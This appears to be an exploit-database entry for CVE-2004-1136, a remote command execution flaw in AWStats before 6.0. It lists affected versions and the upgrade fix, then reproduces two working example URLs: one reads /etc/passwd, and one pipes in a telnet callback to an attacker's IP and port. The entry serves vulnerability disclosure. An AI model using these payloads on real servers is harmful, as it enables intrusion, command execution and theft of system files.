header-logo
Suggest Exploit
vendor:
AWStats
by:
Unknown
9
CVSS
CRITICAL
Remote Command Execution
78
CWE
Product Name: AWStats
Affected Version From: AWStats before 6.0
Affected Version To: AWStats 6.0
Patch Exists: YES
Related CWE: CVE-2004-1136
CPE: a:awstats_project:awstats
Metasploit:
Other Scripts:
Platforms Tested:
2004

awstats.pl Remote Command Execution

The awstats.pl script in AWStats before 6.0 allows remote attackers to execute arbitrary commands via shell metacharacters in the (1) config parameter or (2) framename parameter.

Mitigation:

Upgrade to AWStats 6.0 or later.
Source

Exploit-DB raw data:

Example:

http://[target]/awstats.pl?filterrawlog=&rawlog_maxlines=5000&config=stats.jdims.info&framename=main&pluginmode=rawlog&log file=/etc/passwd

http://[target]/awstats.pl?filterrawlog=&rawlog_maxlines=5000&config=stats.jdims.info&framename=main&pluginmode=rawlog&logfile=&logfile=|telnet <your ip> <port>


# milw0rm.com [2004-08-21]

Navigation

Suggest Exploit

Services By CQR